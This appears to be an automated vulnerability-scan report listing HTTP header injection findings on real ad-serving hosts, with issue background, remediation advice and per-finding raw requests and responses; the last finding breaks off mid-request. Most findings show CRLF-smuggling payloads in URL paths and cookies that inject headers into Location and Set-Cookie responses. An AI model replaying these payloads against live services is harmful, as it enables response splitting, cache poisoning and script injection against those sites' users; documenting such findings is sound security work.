http://ad.doubleclick.net/adj/pand.default/prod.backstage [REST URL parameter 1]
http://ad.doubleclick.net/adj/pand.default/prod.community [REST URL parameter 1]
http://ad.doubleclick.net/adj/prize.pogo/prizes [REST URL parameter 1]
http://ad.doubleclick.net/adj/scrabble.pogo/load [REST URL parameter 1]
http://ad.doubleclick.net/adj/scrabble.pogo/room [REST URL parameter 1]
http://ad.doubleclick.net/adj/surveys.pogo/misc [REST URL parameter 1]
http://ad.doubleclick.net/jump/downloads.pogo/category [REST URL parameter 1]
http://ad.doubleclick.net/jump/home.pogo/spotlight [REST URL parameter 1]
http://ad.doubleclick.net/jump/prize.pogo/prizes [REST URL parameter 1]
http://ad.doubleclick.net/jump/scrabble.pogo/load [REST URL parameter 1]
http://ad.doubleclick.net/jump/scrabble.pogo/room [REST URL parameter 1]
http://ad.doubleclick.net/jump/surveys.pogo/misc [REST URL parameter 1]
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]
https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 586bb%0d%0a9799c72b680 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /586bb%0d%0a9799c72b680/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/586bb
9799c72b680/N6271.148484.FRONTLINEDIRECTINC./B4796131.29:
Date: Sun, 09 Jan 2011 02:03:07 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/ad/downloads.pogo/category [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3913f%0d%0a3c0a349169b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3913f%0d%0a3c0a349169b/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3913f
3c0a349169b/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:03:08 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/ad/home.pogo/spotlight [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e05c%0d%0a76a123a846 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e05c%0d%0a76a123a846/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e05c
76a123a846/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632:
Date: Sun, 09 Jan 2011 02:03:09 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/ad/scrabble.pogo/load [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a67f%0d%0a245da988542 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a67f%0d%0a245da988542/scrabble.pogo/load HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a67f
245da988542/scrabble.pogo/load:
Date: Sun, 09 Jan 2011 02:03:14 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/ad/scrabble.pogo/room [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c29f%0d%0a119f9246290 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c29f%0d%0a119f9246290/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c29f
119f9246290/scrabble.pogo/room%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D326364:
Date: Sun, 09 Jan 2011 02:03:14 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5621.148484.0233710364621/B4682144

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f927%0d%0a372c17095f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f927%0d%0a372c17095f9/N5621.148484.0233710364621/B4682144 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5f927
372c17095f9/N5621.148484.0233710364621/B4682144:
Date: Sun, 09 Jan 2011 02:03:16 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6457.4298.ADVERTISING.COM/B4840137.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2379a%0d%0acb4e6408377 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2379a%0d%0acb4e6408377/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2379a
cb4e6408377/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http: //r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn%3D64
Date: Sun, 09 Jan 2011 02:03:04 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/downloads.pogo/category [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31153%0d%0aafba1dd703b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31153%0d%0aafba1dd703b/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31153
afba1dd703b/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:02:58 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/home.pogo/spotlight [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1329b%0d%0a901e1fb73e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1329b%0d%0a901e1fb73e9/home.pogo/spotlight HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1329b
901e1fb73e9/home.pogo/spotlight:
Date: Sun, 09 Jan 2011 02:02:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/pand.default/prod.backstage [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/pand.default/prod.backstage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ee0e%0d%0a014a1f82eea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ee0e%0d%0a014a1f82eea/pand.default/prod.backstage HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ee0e
014a1f82eea/pand.default/prod.backstage:
Date: Sun, 09 Jan 2011 02:02:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/pand.default/prod.community [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/pand.default/prod.community

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 11083%0d%0a8a9bf6293f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /11083%0d%0a8a9bf6293f5/pand.default/prod.community;ag=0;gnd=0;hours=0;comped=0;fb=0;dma=0;clean=0;spgs=0;u=ag*0!gnd*0!hours*0!comped*0!fb*0!dma*0!clean*0!spgs*0;sz=728x90;tile=1;ord=1294536983566535667 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536983566535667&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/11083
8a9bf6293f5/pand.default/prod.community%3Bag%3D0%3Bgnd%3D0%3Bhours%3D0%3Bcomped%3D0%3Bfb%3D0%3Bdma%3D0%3Bclean%3D0%3Bspgs%3D0%3Bu%3Dag%2A0%21gnd%2A0%21hours%2A0%21comped%2A0%21fb%2A0%21dma%2A0%21clean%2A0%21spgs%2A0%3Bsz%3D728x90%3Btile%3D1%3Bord%3D1294536983566535667:
Date: Sun, 09 Jan 2011 02:01:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/prize.pogo/prizes [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/prize.pogo/prizes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31be3%0d%0ad74a84518d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31be3%0d%0ad74a84518d3/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/prize/prize.do?pageSection=header_prizes
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31be3
d74a84518d3/prize.pogo/prizes%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D780687:
Date: Sun, 09 Jan 2011 02:02:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/scrabble.pogo/load [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b770%0d%0ab65cef34867 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b770%0d%0ab65cef34867/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8b770
b65cef34867/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319:
Date: Sun, 09 Jan 2011 02:02:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/scrabble.pogo/room [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a418%0d%0ac5139b784f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a418%0d%0ac5139b784f3/scrabble.pogo/room HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4a418
c5139b784f3/scrabble.pogo/room:
Date: Sun, 09 Jan 2011 02:03:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/adj/surveys.pogo/misc [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/surveys.pogo/misc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12804%0d%0a48b5790cf88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12804%0d%0a48b5790cf88/surveys.pogo/misc HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12804
48b5790cf88/surveys.pogo/misc:
Date: Sun, 09 Jan 2011 02:03:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.16. http://ad.doubleclick.net/jump/downloads.pogo/category [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13037%0d%0afced369b2cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13037%0d%0afced369b2cc/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13037
fced369b2cc/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:03:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.17. http://ad.doubleclick.net/jump/home.pogo/spotlight [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 556e1%0d%0a2fda3d0e5cf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /556e1%0d%0a2fda3d0e5cf/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/556e1
2fda3d0e5cf/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632:
Date: Sun, 09 Jan 2011 02:03:25 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.18. http://ad.doubleclick.net/jump/prize.pogo/prizes [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/prize.pogo/prizes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66506%0d%0acee2014b2d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66506%0d%0acee2014b2d9/prize.pogo/prizes HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66506
cee2014b2d9/prize.pogo/prizes:
Date: Sun, 09 Jan 2011 02:03:22 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.19. http://ad.doubleclick.net/jump/scrabble.pogo/load [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 79e85%0d%0a73d9c50a5a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /79e85%0d%0a73d9c50a5a7/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/79e85
73d9c50a5a7/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319:
Date: Sun, 09 Jan 2011 02:03:35 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.20. http://ad.doubleclick.net/jump/scrabble.pogo/room [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 877c2%0d%0a03fa4dd3a61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /877c2%0d%0a03fa4dd3a61/scrabble.pogo/room HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/877c2
03fa4dd3a61/scrabble.pogo/room:
Date: Sun, 09 Jan 2011 02:03:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.21. http://ad.doubleclick.net/jump/surveys.pogo/misc [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/surveys.pogo/misc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 64dc6%0d%0ae88543e460e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /64dc6%0d%0ae88543e460e/surveys.pogo/misc HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/64dc6
e88543e460e/surveys.pogo/misc:
Date: Sun, 09 Jan 2011 02:03:22 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.22. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 452b0%0d%0a6b6ad7cf9b8 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0452b0%0d%0a6b6ad7cf9b8; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0452b0
6b6ad7cf9b8; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:06:27 GMT
Connection: close

2.23. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 62e1e%0d%0a91a63bf7646 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=128 HTTP/1.1
